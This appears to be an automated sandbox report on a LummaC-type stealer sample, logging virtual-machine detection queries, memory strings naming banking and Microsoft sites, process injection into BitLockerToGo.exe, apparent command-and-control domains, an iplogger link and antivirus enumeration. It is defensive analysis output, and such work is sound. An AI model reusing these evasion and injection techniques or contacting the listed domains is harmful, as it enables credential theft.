                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeMemory allocated: F70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeMemory allocated: 2D90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWindow / User API: threadDelayed 2894Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWindow / User API: threadDelayed 6796Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exe TID: 7080Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 8076Thread sleep time: -210000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
                    Source: BitLockerToGo.exe, 00000009.00000002.2820293806.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2781264370.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.2820077021.0000000003448000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2725717754.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2818351872.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2764259056.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2760836658.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806622560.0000000003494000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                    Source: 7.exe.0.drBinary or memory string: github.com/vmware/govmomi/vim25/debug.init
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696508427p
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2591063411.0000000007049000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578365663.0000000001041000.00000004.00000020.00020000.00000000.sdmp, 7.exe, 00000008.00000002.2709022816.0000022523BE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: 7.exe.0.drBinary or memory string: depgithub.com/vmware/govmomiv0.38.0h1:UvQpLAOjDpO0JUxoPCXnEzOlEa/9kejO6K58qOFr6cM=
                    Source: 7.exe.0.drBinary or memory string: github.com/vmware/govmomi@v0.38.0/vim25/debug/debug.go
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                    Source: BitLockerToGo.exe, 00000009.00000002.2820293806.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2781264370.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2725717754.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2818351872.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2764259056.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2760836658.0000000003494000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2806622560.0000000003494000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                    Source: BitLockerToGo.exe, 00000009.00000003.2738115204.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2581527548.0000000004285000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 9_2_03239BC0 LdrInitializeThunk,9_2_03239BC0
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\7.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3200000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Local\Temp\7.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3200000 value starts with: 4D5AJump to behavior
                    LummaC encrypted strings found
                    Source: 7.exe, 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: pedestriankodwu.xyz
                    Source: 7.exe, 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: towerxxuytwi.xyz
                    Source: 7.exe, 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ellaboratepwsz.xyz
                    Source: 7.exe, 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: penetratedpoopp.xyz
                    Source: 7.exe, 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: swellfrrgwwos.xyz
                    Source: 7.exe, 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: contintnetksows.shop
                    Source: 7.exe, 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: foodypannyjsud.shop
                    Source: 7.exe, 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: potterryisiw.shop
                    Source: 7.exe, 00000008.00000002.2708462013.000000C000C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: willingyhollowsk.shop
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Temp\7.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3200000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 309A008Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1lLubJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeProcess created: C:\Users\user\AppData\Local\Temp\7.exe "C:\Users\user\AppData\Local\Temp\7.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Users\user\Desktop\dlcdkJcbbV.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\7.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
